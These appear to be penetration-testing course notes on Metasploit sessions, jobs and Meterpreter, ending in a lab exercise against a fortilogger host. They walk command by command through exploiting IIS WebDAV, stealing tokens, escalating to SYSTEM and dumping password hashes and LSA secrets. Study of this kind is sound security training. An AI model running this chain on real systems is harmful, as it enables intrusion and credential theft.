# Sessions & Jobs

- MSF can manage multiple modules at the same time using sessions
- Able to switch between sessions and link a different module to one of the bg'ed sessions to run on it, or turn them into jobs
- While running a module in `msfconsole`, we can bg the session, as long as it forms a channel of communication with the target host, by pressing the `[CTRL] + [Z]` key combination or by typing the `background` command in the case of Meterpreter stages

```bash
msf6 > sessions         #shows current sessions
msf6 > sessions -i N    #opens session N
```

- We can use the `jobs` command to look at the currently active tasks running in the background and terminate the old ones to free up the port

```bash
msf6 > jobs -h                                #shows jobs help menu
msf6 exploit(multi/handler) > exploit -j      #runs exploit module as a job
msf6 > jobs -l                                #lists current jobs
```

# Meterpreter

- The `Meterpreter` payload is a specific type of multi-faceted, extensible payload that uses DLL injection to ensure the connection to the victim host is stable and difficult to detect using simple checks, and it can be configured to be persistent across reboots or system changes
- Meterpreter resides in the memory of the remote host and leaves no traces on disk
- Purpose: improves post-exploitation procedures, offering a hand-picked set of relevant tools for more straightforward enumeration of the target host from the inside
- Can help us with various privesc techniques, AV evasion techniques, further vulnerability research, providing persistent access, pivoting, etc.
- Designed to be stealthy, powerful, and extensible

```bash
msf6 > db_nmap -sV -p- -T5 -A <target_ip>
msf6 > hosts
msf6 > services
msf6 > search iis_webdav_upload_asp
msf6 > use 0
msf6 > set RHOST <target_ip>
msf6 > set LHOST tun0
msf6 > run
meterpreter > getuid
meterpreter > ps
meterpreter > steal_token N
meterpreter > getuid
meterpreter > shell
c:\Inetpub>dir     #shows contents of current directory associated with Windows web host
c:\Inetpub>exit
meterpreter > bg   #bg the meterpreter session
msf6 > search local_exploit_suggester
msf6 > use 0          #select a multi recon module such as post/multi/recon/local_exploit_suggester
msf6 > show options   #options for multi recon module
msf6 > sessions       #shows current sessions
msf6 > set SESSION 1  #bind the multi recon module to session 1 (bg'ed meterpreter session)
msf6 > run            #execute the multi recon module
#multiple privesc vectors shown
msf6 > use exploit/xxx   #select one of the privesc vectors
msf6 > show options
msf6 > sessions          #shows current sessions
msf6 > set SESSION 1
msf6 > run
meterpreter > getuid     #we are NT AUTHORITY\SYSTEM
meterpreter > hashdump   #shows NT or LM hashes
meterpreter > lsa_dump_sam   #shows NTLM hashes for users
#may need to "meterpreter > load kiwi" for this command
meterpreter > lsa_dump_secrets
```

## Meterpreter Sessions Exercise

![[images/Pasted image 20251005140739.png]]

![[images/Pasted image 20251005140758.png]]

- Above is a possible privesc vector that must be bound to a meterpreter session
- We don't have a meterpreter session yet, so let's open the web page for port 5000
- fortilogger app is running on port 5000 with the Microsoft IIS httpd 10.0 host
- Run a Google search for fortilogger and Microsoft IIS httpd 10.0
- fortilogger looks vulnerable, run another msf search

![[images/Pasted image 20251005141108.png]]

![[images/Pasted image 20251005140646.png]]